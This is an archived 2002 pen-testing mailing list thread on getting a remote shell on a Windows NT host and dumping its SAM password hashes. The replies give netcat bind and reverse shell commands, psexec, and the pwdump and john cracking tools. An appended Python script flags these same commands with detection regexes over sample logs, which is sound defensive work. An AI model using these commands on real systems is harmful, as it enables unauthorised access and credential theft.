Penetration Testing mailing list archives
RE: Access to a win NT box
From: "Mark Maher" <Mmaher () ochsner org>
Date: Fri, 28 Jun 2002 08:07:55 -0500
Like Marlon Jabbur noted, use psexec from http://www.sysinternals.com/ntw2k/freeware/pstools.shtml :

    C:\>psexec \\192.168.1.1 cmd.exe

Don't mess around with the scheduler and net time. Psexec makes it much easier. Also, once you have admin, you can use pwdump3 and then john or L0pht to crack the passwords.

"Panos Dimitriou" <p.dimitriou () encode-sec com> 06/26/02 11:23AM >>>
You can always upload any tool you like, such as pwdump, and then you just have to execute it. In order to execute it you can:

1. upload netcat (nc.exe)
2. execute "net time \\target"
3. schedule a job like:

    at \\target 7:14P ""c:\nc.exe -L -p 2222 -e cmd.exe

and then establish a connection (with netcat preferably) to port 2222 or, if the system is firewalled

    at \\target 7:14P ""c:\nc.exe [your IP] 80 -e cmd.exe

and have a netcat listening on port 80 (nc -L -p 80) in order to establish a reverse shell.

After gaining a shell on the system execute pwdump and download the results. Furthermore, if you use pwdump2 you can extract the passwords even if the SAM is SYSKEY protected.

I hope this helped

________________________
Panos Dimitriou
Director, Managed Security Services
_________________________
ENCODE S.A.
3, R. Melodou str.
151 25 Marousi
Athens, Greece
_________________________
Tel.: +30 (1) 6178410
Fax.: +30 (1) 6109579
p.dimitriou () encode-sec com
www.encode-sec.com
_________________________

-----Original Message-----
From: Pedro Miranda [mailto:rpmiranda () sonae pt]
Sent: Tuesday, June 25, 2002 7:43 PM
To: pen-test () securityfocus com
Subject: Access to a win NT box

Hi,

I've got remote access to a wNT box using the command

    \\machinename\c$ /user:machinename\administrator

So I've got administrator privileges but I want to access the SAM database. I've tried to get \\winnt\repair\sam._ but I couldn't find the rdisk command. Can anybody help tell me where can I find this software, or if there is another way to get access to the sam file.

Thanks in advance

----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service.
For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/
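
For defenders, the remote-execution steps described in this thread leave recognizable process command lines. The following is an added example, not part of the original posts: a small Python filter run over constructed log records. The `host|user|command line` record format, the host names and the rule names are assumptions made for the example.

```python
import re

# Rule name -> pattern over a process command line. The patterns mirror the
# commands quoted in the thread; the rule names are made up for this example.
RULES = {
    "remote_at_job": re.compile(r"(?i)(?:^|[\\/\s])at(?:\.exe)?\s+\\\\\S+\s+\d{1,2}:\d{2}"),
    "netcat_shell": re.compile(r"(?i)\bnc(?:\.exe)?\b.*\s-e\s+\S*cmd(?:\.exe)?\b"),
    "psexec_remote": re.compile(r"(?i)\bpsexec(?:\.exe)?\b.*\\\\\S+"),
    "pwdump_tool": re.compile(r"(?i)\bpwdump\d?(?:\.exe)?\b"),
    "net_time_remote": re.compile(r"(?i)\bnet(?:\.exe)?\s+time\s+\\\\\S+"),
}

# Constructed sample records (host|user|command line), not real log data.
SAMPLE = r"""
WS01|alice|notepad.exe C:\docs\report.txt
SRV02|administrator|net time \\SRV09
SRV02|administrator|at \\SRV09 19:14 c:\nc.exe -L -p 2222 -e cmd.exe
WS07|bob|psexec \\10.0.0.5 cmd.exe
SRV09|SYSTEM|c:\nc.exe -L -p 2222 -e cmd.exe
SRV09|SYSTEM|c:\temp\pwdump3.exe
WS03|carol|cmd.exe /c type C:\chat\notes.txt
"""


def detect(log_text):
    """Return (host, user, sorted rule names) for every record that matches a rule."""
    alerts = []
    for line in log_text.strip().splitlines():
        parts = line.split("|", 2)
        if len(parts) != 3:
            continue  # skip malformed records
        host, user, cmd = parts
        hits = sorted(name for name, rx in RULES.items() if rx.search(cmd))
        if hits:
            alerts.append((host, user, hits))
    return alerts


if __name__ == "__main__":
    for host, user, hits in detect(SAMPLE):
        print(f"{host:6} {user:14} {', '.join(hits)}")
```

A `net time` against a remote host followed shortly by a remote `at` job from the same account is a stronger signal than either record alone, so correlating the alerts by host and user is a natural next step.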